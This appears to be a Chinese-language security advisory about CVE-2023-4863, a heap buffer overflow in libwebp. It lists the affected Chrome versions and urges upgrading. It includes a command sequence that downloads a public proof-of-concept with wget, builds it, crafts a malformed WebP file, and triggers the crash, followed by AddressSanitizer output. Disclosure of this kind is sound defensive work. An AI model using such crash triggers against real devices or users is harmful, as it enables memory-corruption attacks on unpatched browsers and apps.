一、漏洞概述
WebP圖像編解碼庫libwebp存在堆緩沖區溢出漏洞(CVE-2023-4863),攻擊者可以通過發送植入惡意代碼的WebP圖像獲得設備的部分權限。
WebP是由Google開發的一種圖像格式,可為網絡圖像提供有損和無損壓縮。它旨在減小圖像的文件大小,同時不損失其視覺質量。Google Chrome是由Google開發的一款支持WebP圖像格式的網頁瀏覽器。
由于libwebp的使用范圍廣泛,不僅應用于各大瀏覽器,還包含在系統的底層庫中 (例如:Android),以及目前滿大街都是的Electron中無一例外均使用了libwebp 庫。請各位盡快更新瀏覽器及使用Electron技術的相關應用。
但CVE-2023-4863并未包含在Google即將在下月發布的10月安全更新之中 (一般 Google會提前半個月至一個月向合作廠商發布下月安全補丁,以便廠商能夠迅速修復漏洞),考慮到該漏洞已經可能有野外利用的例子,Android設備目前相對而言還是比較危險的,不知Google后續是否有額外更新計劃來緊急修復該漏洞。否則按現有更新計劃,可能就要等到11月安全補丁才會修復了。
也希望Google能夠像之前爆出藍牙漏洞時那樣,為已經停止支持的舊設備 (如 Pixel 4a) 提供計劃外安全更新。 補充:根據Mishaal Rahman老師的消息,Google有可能推出2023-10-06安全補丁等級來專門修復該漏洞,但若廠商無意更新,則還要遲至11月安全補丁才會修復。
# checkout webp $ git clone https://chromium.googlesource.com/webm/libwebp/ webp_test $ cd webp_test/ # checkout vulnerable version $ git checkout 7ba44f80f3b94fc0138db159afea770ef06532a0 # enable AddressSanitizer $ sed -i 's/^EXTRA_FLAGS=.*/& -fsanitize=address/' makefile.unix # build webp $ make -f makefile.unix $ cd examples/ # fetch mistymntncop's proof-of-concept code $ wget https://raw.githubusercontent.com/mistymntncop/CVE-2023-4863/main/craft.c # build and run proof-of-concept $ gcc -o craft craft.c $ ./craft bad.webp # test trigger file $ ./dwebp bad.webp -o test.png ================================================================= ==207551==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x626000002f28 at pc 0x56196a11635a bp 0x7ffd3e5cce90 sp 0x7ffd3e5cce80 WRITE of size 1 at 0x626000002f28 thread T0 #0 0x56196a116359 in BuildHuffmanTable (/home/isosceles/source/webp/webp_test/examples/dwebp+0xb6359) #1 0x56196a1166e7 in VP8LBuildHuffmanTable (/home/isosceles/source/webp/webp_test/examples/dwebp+0xb66e7) #2 0x56196a0956ff in ReadHuffmanCode (/home/isosceles/source/webp/webp_test/examples/dwebp+0x356ff) #3 0x56196a09a2b5 in DecodeImageStream (/home/isosceles/source/webp/webp_test/examples/dwebp+0x3a2b5) #4 0x56196a09e216 in VP8LDecodeHeader (/home/isosceles/source/webp/webp_test/examples/dwebp+0x3e216) #5 0x56196a0a011b in DecodeInto (/home/isosceles/source/webp/webp_test/examples/dwebp+0x4011b) #6 0x56196a0a2f06 in WebPDecode (/home/isosceles/source/webp/webp_test/examples/dwebp+0x42f06) #7 0x56196a06c026 in main (/home/isosceles/source/webp/webp_test/examples/dwebp+0xc026) #8 0x7f7ea8a8c082 in __libc_start_main ../csu/libc-start.c:308 #9 0x56196a06e09d in _start (/home/isosceles/source/webp/webp_test/examples/dwebp+0xe09d) 0x626000002f28 is located 0 bytes to the right of 11816-byte region [0x626000000100,0x626000002f28) allocated by thread T0 here: #0 0x7f7ea8f2d808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 #1 0x56196a09a0eb in DecodeImageStream (/home/isosceles/source/webp/webp_test/examples/dwebp+0x3a0eb) SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/isosceles/source/webp/webp_test/examples/dwebp+0xb6359) in BuildHuffmanTable ...
二、影響范圍
Google Chrome(Windows)版本 < 116.0.5845.187/.188
Google Chrome(Mac/Linux)版本 < 116.0.5845.187
三、安全措施3.1升級版本
目前該漏洞已經修復,受影響用戶可升級到以下版本:
Google Chrome(Windows)版本 >=116.0.5845.187/.188
Google Chrome(Mac/Linux)版本 >=116.0.5845.187
四、下載地址
五、手動檢查更新可在Chrome 菜單-【幫助】-【關于 Google Chrome】檢查版本更新,并在更新完成后重新啟動。


審核編輯:湯梓紅
-
Android
+關注
關注
12文章
3959瀏覽量
129299 -
Google
+關注
關注
5文章
1782瀏覽量
58551 -
代碼
+關注
關注
30文章
4882瀏覽量
70075
原文標題:WebP圖像編解碼庫libwebp存在堆緩沖區溢出漏洞(升級Google Chrome瀏覽器為最新版本)
文章出處:【微信號:哆啦安全,微信公眾號:哆啦安全】歡迎添加關注!文章轉載請注明出處。
發布評論請先 登錄
基于中間匯編的緩沖區溢出檢測模型
二進制環境下的緩沖區溢出漏洞動態檢測
基于可執行代碼的緩沖區溢出檢測模型
Windows緩沖區溢出攻擊的實例研究
緩沖區溢出攻擊的原理和防范技術分析
為什么緩沖區溢出會帶來危害?會帶來哪些危害?

消除物聯網上的緩沖區溢出漏洞
緩沖區溢出漏洞的原理、成因、類型及最佳防范實踐(借助Perforce 的Klocwork/Hleix QAC等靜態代碼分析工具)

評論